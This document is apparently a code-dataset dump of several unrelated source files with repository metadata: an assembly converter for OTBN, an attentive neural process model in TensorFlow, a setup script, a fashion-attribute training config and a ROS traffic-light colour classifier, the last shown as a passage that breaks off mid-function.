otbn_ins_obj = item.convert_otbn(idx)
if otbn_ins_obj:
otbn_ins_obj_list.extend(otbn_ins_obj)
if len(otbn_ins_obj) > 1:
ins_objects_len[idx] = len(otbn_ins_obj)
ins_objects_push[idx+1:] = [i + len(otbn_ins_obj) - 1 for i in ins_objects_push[idx+1:]]
else:
otbn_ins_obj_list.append(item)
#for item in otbn_ins_obj_list:
# print(item)
# create list of new loopranges
loopranges_otbn = []
# iterate over existing loopranges and see if they have been relocated
for item in ctx.loopranges:
# we have to consider that the last instruction in a loop is now possibly longer than 1 instruction
loopranges_otbn.append(range(item[0]+ins_objects_push[item[0]], item[-1] + ins_objects_push[item[-1]] + ins_objects_len[item[-1]]-1))
# find loop instructions and adjust them
for item in loopranges_otbn:
# modify loop instructions
ins = otbn_ins_obj_list[item[0]]
if not (isinstance(ins, IOtLoopi) or isinstance(ins, IOtLoop) or isinstance(ins, ILoop)):
raise Exception("Expected loop instruction")
current_len = ins.len
new_len = len(item)
if current_len != new_len:
logging.info('Extended loop length at (new) address ' + str(item[0]) + ' by ' + str(new_len-current_len)
+ ' from ' + str(current_len) + ' to ' + str(new_len) + '.')
ins.len = new_len
# assign list with new loop ranges to context
ctx.loopranges = loopranges_otbn
# create new dictionary for labels {address:label)}
# there are no dedicated function labels in otbn format
labels_otbn = {}
for item in ctx.labels:
new_loc = ins_objects_push[item] + item
if new_loc != item:
logging.info('Relocating address of label ' + str(ctx.labels.get(item)) + ' from ' + str(item)
+ ' to ' + str(new_loc) + '.')
labels_otbn.update({new_loc:ctx.labels.get(item)})
for item in ctx.functions:
new_loc = ins_objects_push[item] + item
if new_loc != item:
logging.info('Relocating address of function ' + str(ctx.functions.get(item)) + ' from ' + str(item)
+ ' to ' + str(new_loc) + '.')
labels_otbn.update({new_loc:ctx.functions.get(item)})
# adjust branch, call and jump instructions
inv_labels = {v: k for k, v in labels_otbn.items()}
    for idx, item in enumerate(otbn_ins_obj_list):
if isinstance(item, IOtBne) or isinstance(item, IOtBeq):
if not item.label:
raise Exception('No label associated with branch instruction at (new) address ' + str(idx) +
'. Cannot relocate')
# set address
item.addr = idx
new_target_addr = inv_labels.get(item.label)
new_offset = new_target_addr - item.addr
if new_offset != item.offset:
logging.info('Adjusting branch offset for branch instruction at (new) address ' + str(idx) + ' from '
+ str(item.offset) + ' to ' + str(new_offset) + ' (for label '
+ str(labels_otbn.get(new_target_addr)) + ')')
item.offset = new_offset
if isinstance(item, IBranch):
if not item.label:
raise Exception('No label associated with branch instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target = inv_labels.get(item.label)
if new_target != item.imm:
logging.info('Adjusting branch target for branch instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_target) + ' (for label '
+ str(labels_otbn.get(new_target)) + ')')
item.imm = new_target
item.addr = idx
if isinstance(item, IOtJal):
if not item.label:
raise Exception('No function label associated with JAL instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target_addr = inv_labels.get(item.label)
new_offset = new_target_addr - item.addr
if new_offset != item.imm:
logging.info('Adjusting jump offset for JAL instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_offset) + ' (for label '
                             + str(labels_otbn.get(new_target_addr)) + ')')
item.imm = new_offset
if isinstance(item, ICall):
if not item.label:
                raise Exception('No function label associated with CALL instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target_addr = inv_labels.get(item.label)
if new_target_addr != item.imm:
logging.info('Adjusting jump target for CALL instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_target_addr) + ' (for label '
                             + str(labels_otbn.get(new_target_addr)) + ')')
item.imm = new_target_addr
item.addr = idx
# assign new dictionary with {label addresses:labels} to context
ctx.labels = labels_otbn
disassembler = Disassembler.from_ins_objects_and_context(otbn_ins_obj_list, ctx)
asm_lines = disassembler.create_assembly(opt_address=args.addresses, format='otbn')
for item in asm_lines:
print(item)
if __name__ == "__main__":
main()
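# Example invocation (file names are assumptions):
#   python convert2otbn.py -a dcrypto_program.asm > program_otbn.asm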
| 46.757732
| 141
| 0.598721
|
import argparse
import logging
from bignum_lib.sim_helpers import ins_objects_from_asm_file
from bignum_lib.disassembler import Disassembler
from bignum_lib.instructions import ILoop
from bignum_lib.instructions_ot import IOtLoop
from bignum_lib.instructions_ot import IOtLoopi
from bignum_lib.instructions_ot import IOtJal
from bignum_lib.instructions import ICall
from bignum_lib.instructions_ot import IOtBeq
from bignum_lib.instructions_ot import IOtBne
from bignum_lib.instructions import IBranch
from bignum_lib.instructions_ot import IOtLui
from bignum_lib.instructions_ot import IOtAddi
from bignum_lib.instructions import IMovi
def handle_movi_combined(ins1, ins2):
return
def main():
logging.basicConfig(level=logging.DEBUG)
argparser = argparse.ArgumentParser(description='Dcrypto to OTBN assembly converter')
argparser.add_argument('infile', help="Input Assembly file")
argparser.add_argument('-a', '--addresses',
help='print address for each instruction',
action='store_true')
argparser.add_argument('-w', '--dmem-word-addressing',
help='use WLEN word addressing for dmem instead of byte addressing',
action='store_true')
    args = argparser.parse_args()
try:
infile = open(args.infile)
except IOError:
print('Could not open file ' + args.infile)
exit()
byte_addressing = not args.dmem_word_addressing
ins_objects, ctx, _ = ins_objects_from_asm_file(infile, dmem_byte_addressing=byte_addressing)
infile.close()
ins_objects_push = [0]*len(ins_objects)
ins_objects_len = [1] * len(ins_objects)
otbn_ins_obj_list = []
ignore_next = False
for idx, item in enumerate(ins_objects):
if ignore_next:
ignore_next = False
continue
otbn_ins_obj = item.convert_otbn(idx)
if otbn_ins_obj:
otbn_ins_obj_list.extend(otbn_ins_obj)
if len(otbn_ins_obj) > 1:
ins_objects_len[idx] = len(otbn_ins_obj)
ins_objects_push[idx+1:] = [i + len(otbn_ins_obj) - 1 for i in ins_objects_push[idx+1:]]
else:
otbn_ins_obj_list.append(item)
loopranges_otbn = []
for item in ctx.loopranges:
loopranges_otbn.append(range(item[0]+ins_objects_push[item[0]], item[-1] + ins_objects_push[item[-1]] + ins_objects_len[item[-1]]-1))
for item in loopranges_otbn:
ins = otbn_ins_obj_list[item[0]]
if not (isinstance(ins, IOtLoopi) or isinstance(ins, IOtLoop) or isinstance(ins, ILoop)):
raise Exception("Expected loop instruction")
current_len = ins.len
new_len = len(item)
if current_len != new_len:
logging.info('Extended loop length at (new) address ' + str(item[0]) + ' by ' + str(new_len-current_len)
+ ' from ' + str(current_len) + ' to ' + str(new_len) + '.')
ins.len = new_len
ctx.loopranges = loopranges_otbn
labels_otbn = {}
for item in ctx.labels:
new_loc = ins_objects_push[item] + item
if new_loc != item:
logging.info('Relocating address of label ' + str(ctx.labels.get(item)) + ' from ' + str(item)
+ ' to ' + str(new_loc) + '.')
labels_otbn.update({new_loc:ctx.labels.get(item)})
for item in ctx.functions:
new_loc = ins_objects_push[item] + item
if new_loc != item:
logging.info('Relocating address of function ' + str(ctx.functions.get(item)) + ' from ' + str(item)
+ ' to ' + str(new_loc) + '.')
labels_otbn.update({new_loc:ctx.functions.get(item)})
inv_labels = {v: k for k, v in labels_otbn.items()}
    for idx, item in enumerate(otbn_ins_obj_list):
if isinstance(item, IOtBne) or isinstance(item, IOtBeq):
if not item.label:
raise Exception('No label associated with branch instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target_addr = inv_labels.get(item.label)
new_offset = new_target_addr - item.addr
if new_offset != item.offset:
logging.info('Adjusting branch offset for branch instruction at (new) address ' + str(idx) + ' from '
+ str(item.offset) + ' to ' + str(new_offset) + ' (for label '
+ str(labels_otbn.get(new_target_addr)) + ')')
item.offset = new_offset
if isinstance(item, IBranch):
if not item.label:
raise Exception('No label associated with branch instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target = inv_labels.get(item.label)
if new_target != item.imm:
logging.info('Adjusting branch target for branch instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_target) + ' (for label '
+ str(labels_otbn.get(new_target)) + ')')
item.imm = new_target
item.addr = idx
if isinstance(item, IOtJal):
if not item.label:
raise Exception('No function label associated with JAL instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target_addr = inv_labels.get(item.label)
new_offset = new_target_addr - item.addr
if new_offset != item.imm:
logging.info('Adjusting jump offset for JAL instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_offset) + ' (for label '
                             + str(labels_otbn.get(new_target_addr)) + ')')
item.imm = new_offset
if isinstance(item, ICall):
if not item.label:
                raise Exception('No function label associated with CALL instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target_addr = inv_labels.get(item.label)
if new_target_addr != item.imm:
logging.info('Adjusting jump target for CALL instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_target_addr) + ' (for label '
                             + str(labels_otbn.get(new_target_addr)) + ')')
item.imm = new_target_addr
item.addr = idx
ctx.labels = labels_otbn
disassembler = Disassembler.from_ins_objects_and_context(otbn_ins_obj_list, ctx)
asm_lines = disassembler.create_assembly(opt_address=args.addresses, format='otbn')
for item in asm_lines:
print(item)
if __name__ == "__main__":
main()
| true
| true
|
1c49155e219f958afd05634099aa9374b7bc263b
| 3,163
|
py
|
Python
|
neural_process/anp.py
|
revsic/tf-attentive-neural-process
|
efa3bb0a9b6cfebaa3c1e025a9da00aef8d0a1e2
|
[
"MIT"
] | 4
|
2020-08-30T14:20:05.000Z
|
2021-03-23T12:53:27.000Z
|
neural_process/anp.py
|
revsic/tf-attentive-neural-process
|
efa3bb0a9b6cfebaa3c1e025a9da00aef8d0a1e2
|
[
"MIT"
] | null | null | null |
neural_process/anp.py
|
revsic/tf-attentive-neural-process
|
efa3bb0a9b6cfebaa3c1e025a9da00aef8d0a1e2
|
[
"MIT"
] | 4
|
2020-03-23T06:34:49.000Z
|
2021-10-25T23:57:24.000Z
|
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from neural_process.module.base import Encoder, Decoder, GaussianProb
class AttentiveNP:
"""Attentive Neural Process
Attributes:
z_encoder: Encoder, encoder for latent representation
z_prob: GaussianProb, latent representation to probability distribution
encoder: Encoder, context encoder with self attention
cross_encoder: Encoder, cross context encoder with querying value attention
decoder: Decoder, decoder for context and latent variable
normal_dist: GaussianProb, converter for decoded context to probability distribution
"""
def __init__(self,
z_output_sizes,
enc_output_sizes,
cross_output_sizes,
dec_output_sizes,
self_attention,
cross_attention):
"""Initializer
Args:
z_output_sizes: List[int], number of hidden units for latent representation encoder
enc_output_sizes: List[int], number of hidden units for context encoder
cross_output_sizes: List[int], number of hidden units for cross context encoder
dec_output_sizes: List[int], number of hidden units for decoder
self_attention: Callable[[tf.Tensor], tf.Tensor], self attention method
cross_attention: Callable[[tf.Tensor], tf.Tensor], cross attention method
"""
self.z_encoder = Encoder(z_output_sizes[:-1], self_attention)
self.z_prob = GaussianProb(z_output_sizes[-1],
proj=np.mean(z_output_sizes[-2:]))
self.encoder = Encoder(enc_output_sizes, self_attention, keepdims=True)
self.cross_encoder = Encoder(cross_output_sizes, cross_attention)
self.decoder = Decoder(dec_output_sizes[:-1])
self.normal_dist = GaussianProb(dec_output_sizes[-1], multivariate=True)
    def __call__(self, context, query):
        cx, _ = context
        # Latent path: self-attend over the context set, then sample z from
        # the induced Gaussian.
        z_context = self.z_encoder(context, key=cx, query=cx)
        z_dist, _, _ = self.z_prob(z_context)
        latent = z_dist.sample()
        # Deterministic path: self-attention over the context, followed by
        # cross-attention keyed on the context inputs with the target inputs
        # as queries.
        self_attended = self.encoder(context, key=cx, query=cx)
        cross_attended = self.cross_encoder(self_attended, key=cx, query=query)
        # Concatenate both representations and broadcast over query points
        # before decoding into a predictive distribution.
        context = tf.concat([latent, cross_attended], axis=-1)
        context = tf.tile(tf.expand_dims(context, 1),
                          [1, tf.shape(query)[1], 1])
        rep = self.decoder(context, query)
        dist, mu, sigma = self.normal_dist(rep)
        return dist, mu, sigma
def loss(self, context, query, target):
cx, _ = context
dist, _, _ = self(context, query)
log_prob = dist.log_prob(target)
log_prob = tf.reduce_sum(log_prob)
prior, _, _ = self.z_prob(self.z_encoder(context, key=cx, query=cx))
posterior, _, _ = self.z_prob(self.z_encoder([query, target], key=query, query=query))
kl = tfp.distributions.kl_divergence(prior, posterior)
kl = tf.reduce_sum(kl)
# maximize variational lower bound
loss = -log_prob + kl
return loss
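# Hypothetical training-step sketch (layer sizes, the attention callables and
# the tensors cx, cy, qx, qy are all assumptions, not part of this module):
#   anp = AttentiveNP(z_output_sizes=[128, 128], enc_output_sizes=[128, 128],
#                     cross_output_sizes=[128], dec_output_sizes=[128, 1],
#                     self_attention=self_attn, cross_attention=cross_attn)
#   with tf.GradientTape() as tape:
#       loss = anp.loss((cx, cy), qx, qy)
#   grads = tape.gradient(loss, variables)  # variables gathered from layers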
| 41.077922
| 95
| 0.649067
|
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from neural_process.module.base import Encoder, Decoder, GaussianProb
class AttentiveNP:
def __init__(self,
z_output_sizes,
enc_output_sizes,
cross_output_sizes,
dec_output_sizes,
self_attention,
cross_attention):
self.z_encoder = Encoder(z_output_sizes[:-1], self_attention)
self.z_prob = GaussianProb(z_output_sizes[-1],
proj=np.mean(z_output_sizes[-2:]))
self.encoder = Encoder(enc_output_sizes, self_attention, keepdims=True)
self.cross_encoder = Encoder(cross_output_sizes, cross_attention)
self.decoder = Decoder(dec_output_sizes[:-1])
self.normal_dist = GaussianProb(dec_output_sizes[-1], multivariate=True)
def __call__(self, context, query):
cx, _ = context
z_context = self.z_encoder(context, key=cx, query=cx)
z_dist, _, _ = self.z_prob(z_context)
latent = z_dist.sample()
self_attended = self.encoder(context, key=cx, query=cx)
cross_attended = self.cross_encoder(self_attended, key=cx, query=query)
context = tf.concat([latent, cross_attended], axis=-1)
context = tf.tile(tf.expand_dims(context, 1),
[1, tf.shape(query)[1], 1])
rep = self.decoder(context, query)
dist, mu, sigma = self.normal_dist(rep)
return dist, mu, sigma
def loss(self, context, query, target):
cx, _ = context
dist, _, _ = self(context, query)
log_prob = dist.log_prob(target)
log_prob = tf.reduce_sum(log_prob)
prior, _, _ = self.z_prob(self.z_encoder(context, key=cx, query=cx))
posterior, _, _ = self.z_prob(self.z_encoder([query, target], key=query, query=query))
kl = tfp.distributions.kl_divergence(prior, posterior)
kl = tf.reduce_sum(kl)
loss = -log_prob + kl
return loss
| true
| true
|
1c4917dd6991f237429f66925e799b5c8528dfaf
| 267
|
py
|
Python
|
setup.py
|
caseyjlaw/vlass
|
f8c39401eb247f86e6bfc213133a2fd3c09ac34a
|
[
"BSD-3-Clause"
] | 1
|
2018-07-31T09:50:27.000Z
|
2018-07-31T09:50:27.000Z
|
setup.py
|
caseyjlaw/vlass
|
f8c39401eb247f86e6bfc213133a2fd3c09ac34a
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
caseyjlaw/vlass
|
f8c39401eb247f86e6bfc213133a2fd3c09ac34a
|
[
"BSD-3-Clause"
] | 1
|
2016-07-30T01:13:57.000Z
|
2016-07-30T01:13:57.000Z
|
from setuptools import setup
from version import get_git_version
setup(name='vlass_tools',
version=get_git_version(),
url='http://github.com/caseyjlaw/vlass',
packages=['vlass_tools'],
      install_requires=['astropy', 'numpy'],
zip_safe=False)
| 26.7
| 46
| 0.692884
|
from setuptools import setup
from version import get_git_version
setup(name='vlass_tools',
version=get_git_version(),
url='http://github.com/caseyjlaw/vlass',
packages=['vlass_tools'],
      install_requires=['astropy', 'numpy'],
zip_safe=False)
| true
| true
|
1c491839af56bb218361d4029760d306639504fe
| 3,521
|
py
|
Python
|
configs/category_attribute_predict/global_predictor_vgg.py
|
engahmed1190/mmfashion
|
34ba2d8a9f2daadb4a04d24287664cebde4b14f9
|
[
"Apache-2.0"
] | 3
|
2021-01-17T14:42:38.000Z
|
2022-02-27T10:31:46.000Z
|
configs/category_attribute_predict/global_predictor_vgg.py
|
engahmed1190/mmfashion
|
34ba2d8a9f2daadb4a04d24287664cebde4b14f9
|
[
"Apache-2.0"
] | null | null | null |
configs/category_attribute_predict/global_predictor_vgg.py
|
engahmed1190/mmfashion
|
34ba2d8a9f2daadb4a04d24287664cebde4b14f9
|
[
"Apache-2.0"
] | null | null | null |
import os
# model settings
arch = 'vgg'
attribute_num = 26 # num of attributes
category_num = 50 # num of categories
img_size = (224, 224)
model = dict(
type='GlobalAttrCatePredictor',
backbone=dict(type='Vgg', layer_setting='vgg16'),
global_pool=dict(
type='GlobalPooling',
inplanes=(7, 7),
pool_plane=(2, 2),
inter_channels=[512, 1024],
outchannels=1024),
attr_predictor=dict(
type='AttrPredictor',
inchannels=1024,
outchannels=attribute_num,
loss_attr=dict(
type='BCEWithLogitsLoss',
ratio=1,
weight=None,
size_average=None,
reduce=None,
reduction='mean')),
cate_predictor=dict(
type='CatePredictor',
inchannels=1024,
outchannels=category_num,
loss_cate=dict(
type='CELoss',
ratio=1,
weight=None,
reduction='mean')),
pretrained='checkpoint/vgg16.pth')
pooling = 'RoI'
# dataset settings
dataset_type = 'Attr_Pred'
data_root = 'data/Attr_Predict'
img_norm = dict(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
data = dict(
imgs_per_gpu=128,
workers_per_gpu=4,
train=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/train.txt'),
label_file=os.path.join(data_root, 'Anno_fine/train_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/train_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/train_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/train_landmarks.txt'),
img_size=img_size),
test=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/test.txt'),
label_file=os.path.join(data_root, 'Anno_fine/test_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/test_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/test_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/test_landmarks.txt'),
attr_cloth_file=os.path.join(data_root, 'Anno_fine/list_attr_cloth.txt'),
cate_cloth_file=os.path.join(data_root, 'Anno_fine/list_category_cloth.txt'),
img_size=img_size),
val=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/val.txt'),
label_file=os.path.join(data_root, 'Anno_fine/val_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/val_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/val_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/val_landmarks.txt'),
img_size=img_size))
# optimizer
optimizer = dict(type='SGD', lr=1e-3, momentum=0.9)
optimizer_config = dict()
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=0.1,
step=[10, 20])
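# Note: with the step policy above, the base lr of 1e-3 is expected to decay
# at epochs 10 and 20 (by the framework's default gamma, assumed to be 0.1).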
checkpoint_config = dict(interval=1)
log_config = dict(
interval=10, hooks=[
dict(type='TextLoggerHook'),
])
start_epoch = 0
total_epochs = 50
gpus = dict(train=[0, 1], test=[0])
work_dir = 'checkpoint/CateAttrPredict/vgg/global'
print_interval = 20 # interval to print information
save_interval = 5
init_weights_from = None
load_from = None
resume_from = None
workflow = [('train', total_epochs)]
dist_params = dict(backend='nccl')
log_level = 'INFO'
| 32.302752
| 85
| 0.653792
|
import os
arch = 'vgg'
attribute_num = 26
category_num = 50
img_size = (224, 224)
model = dict(
type='GlobalAttrCatePredictor',
backbone=dict(type='Vgg', layer_setting='vgg16'),
global_pool=dict(
type='GlobalPooling',
inplanes=(7, 7),
pool_plane=(2, 2),
inter_channels=[512, 1024],
outchannels=1024),
attr_predictor=dict(
type='AttrPredictor',
inchannels=1024,
outchannels=attribute_num,
loss_attr=dict(
type='BCEWithLogitsLoss',
ratio=1,
weight=None,
size_average=None,
reduce=None,
reduction='mean')),
cate_predictor=dict(
type='CatePredictor',
inchannels=1024,
outchannels=category_num,
loss_cate=dict(
type='CELoss',
ratio=1,
weight=None,
reduction='mean')),
pretrained='checkpoint/vgg16.pth')
pooling = 'RoI'
dataset_type = 'Attr_Pred'
data_root = 'data/Attr_Predict'
img_norm = dict(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
data = dict(
imgs_per_gpu=128,
workers_per_gpu=4,
train=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/train.txt'),
label_file=os.path.join(data_root, 'Anno_fine/train_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/train_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/train_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/train_landmarks.txt'),
img_size=img_size),
test=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/test.txt'),
label_file=os.path.join(data_root, 'Anno_fine/test_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/test_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/test_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/test_landmarks.txt'),
attr_cloth_file=os.path.join(data_root, 'Anno_fine/list_attr_cloth.txt'),
cate_cloth_file=os.path.join(data_root, 'Anno_fine/list_category_cloth.txt'),
img_size=img_size),
val=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/val.txt'),
label_file=os.path.join(data_root, 'Anno_fine/val_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/val_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/val_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/val_landmarks.txt'),
img_size=img_size))
optimizer = dict(type='SGD', lr=1e-3, momentum=0.9)
optimizer_config = dict()
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=0.1,
step=[10, 20])
checkpoint_config = dict(interval=1)
log_config = dict(
interval=10, hooks=[
dict(type='TextLoggerHook'),
])
start_epoch = 0
total_epochs = 50
gpus = dict(train=[0, 1], test=[0])
work_dir = 'checkpoint/CateAttrPredict/vgg/global'
print_interval = 20
save_interval = 5
init_weights_from = None
load_from = None
resume_from = None
workflow = [('train', total_epochs)]
dist_params = dict(backend='nccl')
log_level = 'INFO'
| true
| true
|
1c491924d7962d7070b22ad2af38acb504012f7b
| 4,120
|
py
|
Python
|
ros/src/tl_detector/light_classification/tl_classifierNN.py
|
Spinch/CarND-Capstone
|
7e507df9f1cc72c76514907464ca9ca3d3ac9e85
|
[
"MIT"
] | 1
|
2018-12-03T18:21:44.000Z
|
2018-12-03T18:21:44.000Z
|
ros/src/tl_detector/light_classification/tl_classifierNN.py
|
Spinch/CarND-Capstone
|
7e507df9f1cc72c76514907464ca9ca3d3ac9e85
|
[
"MIT"
] | 1
|
2018-11-26T14:04:29.000Z
|
2018-11-26T14:04:29.000Z
|
ros/src/tl_detector/light_classification/tl_classifierNN.py
|
Spinch/CarND-Capstone
|
7e507df9f1cc72c76514907464ca9ca3d3ac9e85
|
[
"MIT"
] | 2
|
2018-11-25T21:07:28.000Z
|
2018-11-26T13:34:09.000Z
|
import rospy
import cv2
import numpy as np
from styx_msgs.msg import TrafficLight
from darknet_ros_msgs.msg import BoundingBoxes
class TLClassifierNN(object):
def __init__(self):
#TODO load classifier
self.lastBBox = [[0, 0], [0, 0]]
self.lastBBoxT = rospy.get_time()
def get_classification(self, image):
"""Determines the color of the traffic light in the image
Args:
image (cv::Mat): image containing the traffic light
Returns:
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
t = rospy.get_time()
dt = t - self.lastBBoxT
if dt < 0.1:
rospy.loginfo("Got traffic picture past {} seconds, bbox: x {}:{}, y {}:{}".format(dt,
self.lastBBox[0][0], self.lastBBox[0][1], self.lastBBox[1][0], self.lastBBox[1][1]))
else:
return TrafficLight.UNKNOWN
# Check if box is valid
if self.lastBBox[0][0] == self.lastBBox[0][1] or self.lastBBox[1][0] == self.lastBBox[1][1]:
return TrafficLight.UNKNOWN
# Crop image
bb_image = image[self.lastBBox[1][0]:self.lastBBox[1][1], self.lastBBox[0][0]:self.lastBBox[0][1]]
height, width, channels = bb_image.shape
# Partition into red, yellow and green areas of typical vertical traffic light on site
red_area = bb_image[0:height//3, 0:width]
yellow_area = bb_image[height//3: 2*height//3, 0:width]
green_area = bb_image[2*height//3: height, 0:width]
# Standard coefficients to convert red, yellow and green channels to grayscale
coef_red = [0.1, 0.1, 0.8]
coef_yellow = [0.114, 0.587, 0.299]
coef_green = [0.1, 0.8, 0.1]
# Apply coefficients
red_area = cv2.transform(red_area, np.array(coef_red).reshape((1,3)))
yellow_area = cv2.transform(yellow_area, np.array(coef_yellow).reshape((1,3)))
green_area = cv2.transform(green_area, np.array(coef_green).reshape((1,3)))
# Concatenate obtained grayscale images
bb_image = np.concatenate((red_area,yellow_area,green_area),axis=0)
# Reevaluate dimensions just in case
height, width = bb_image.shape
# Create mask
mask = np.zeros((height, width), np.uint8)
width_off = 3
height_off = 4
cv2.ellipse(mask, (width//2, 1*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
cv2.ellipse(mask, (width//2, 3*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
cv2.ellipse(mask, (width//2, 5*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
# Apply mask
bb_image = np.multiply(bb_image, mask)
# Cut not bright enough pixels
bb_image = cv2.inRange(bb_image, 200, 255)
# Partition into red, yellow and green areas
red_area = bb_image[0:height//3, 0:width]
yellow_area = bb_image[height//3: 2*height//3, 0:width]
green_area = bb_image[2*height//3: height, 0:width]
# Count the number of non-zero pixels in each area
red_cnt = cv2.countNonZero(red_area)
yellow_cnt = cv2.countNonZero(yellow_area)
green_cnt = cv2.countNonZero(green_area)
# Determine which color had max non-zero pixels
if red_cnt > yellow_cnt and red_cnt > green_cnt:
return TrafficLight.RED
elif yellow_cnt > red_cnt and yellow_cnt > green_cnt:
return TrafficLight.YELLOW
# Do not differentiate green and unknown
return TrafficLight.UNKNOWN
def bboxes_cb(self, bBoxes):
for box in bBoxes.bounding_boxes:
# rospy.loginfo("Class: {}, prob: {}, x: {}:{}, y: {}:{}".format(box.Class, box.probability, box.xmin,
# box.xmax, box.ymin, box.ymax))
if box.Class == 'traffic light':
self.lastBBox = [[box.xmin, box.xmax], [box.ymin, box.ymax]]
self.lastBBoxT = rospy.get_time()
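# --- Illustrative sketch (editor's addition, not part of the original node) ---
# The colour decision above boils down to: weight each third of the cropped
# light toward its expected channel, threshold for bright pixels, and pick the
# third with the most hits. A standalone demo on a synthetic BGR image, so it
# runs without ROS or darknet:
def _demo_classify(bb_image):
    h, w, _ = bb_image.shape
    coefs = {'red': [0.1, 0.1, 0.8],
             'yellow': [0.114, 0.587, 0.299],
             'green': [0.1, 0.8, 0.1]}
    counts = {}
    for i, name in enumerate(('red', 'yellow', 'green')):
        band = bb_image[i * h // 3:(i + 1) * h // 3]
        gray = cv2.transform(band, np.array(coefs[name]).reshape((1, 3)))
        counts[name] = cv2.countNonZero(cv2.inRange(gray, 200, 255))
    if counts['red'] > counts['yellow'] and counts['red'] > counts['green']:
        return 'red'
    if counts['yellow'] > counts['red'] and counts['yellow'] > counts['green']:
        return 'yellow'
    return 'unknown'

if __name__ == '__main__':
    img = np.zeros((90, 30, 3), np.uint8)            # black background, BGR
    cv2.circle(img, (15, 15), 10, (0, 0, 255), -1)   # bright red lamp on top
    print(_demo_classify(img))                       # -> 'red'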
| 40.792079
| 120
| 0.602913
|
import rospy
import cv2
import numpy as np
from styx_msgs.msg import TrafficLight
from darknet_ros_msgs.msg import BoundingBoxes
class TLClassifierNN(object):
def __init__(self):
self.lastBBox = [[0, 0], [0, 0]]
self.lastBBoxT = rospy.get_time()
def get_classification(self, image):
t = rospy.get_time()
dt = t - self.lastBBoxT
if dt < 0.1:
rospy.loginfo("Got traffic picture past {} seconds, bbox: x {}:{}, y {}:{}".format(dt,
self.lastBBox[0][0], self.lastBBox[0][1], self.lastBBox[1][0], self.lastBBox[1][1]))
else:
return TrafficLight.UNKNOWN
if self.lastBBox[0][0] == self.lastBBox[0][1] or self.lastBBox[1][0] == self.lastBBox[1][1]:
return TrafficLight.UNKNOWN
bb_image = image[self.lastBBox[1][0]:self.lastBBox[1][1], self.lastBBox[0][0]:self.lastBBox[0][1]]
height, width, channels = bb_image.shape
red_area = bb_image[0:height//3, 0:width]
yellow_area = bb_image[height//3: 2*height//3, 0:width]
green_area = bb_image[2*height//3: height, 0:width]
coef_red = [0.1, 0.1, 0.8]
coef_yellow = [0.114, 0.587, 0.299]
coef_green = [0.1, 0.8, 0.1]
red_area = cv2.transform(red_area, np.array(coef_red).reshape((1,3)))
yellow_area = cv2.transform(yellow_area, np.array(coef_yellow).reshape((1,3)))
green_area = cv2.transform(green_area, np.array(coef_green).reshape((1,3)))
bb_image = np.concatenate((red_area,yellow_area,green_area),axis=0)
height, width = bb_image.shape
mask = np.zeros((height, width), np.uint8)
width_off = 3
height_off = 4
cv2.ellipse(mask, (width//2, 1*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
cv2.ellipse(mask, (width//2, 3*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
cv2.ellipse(mask, (width//2, 5*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
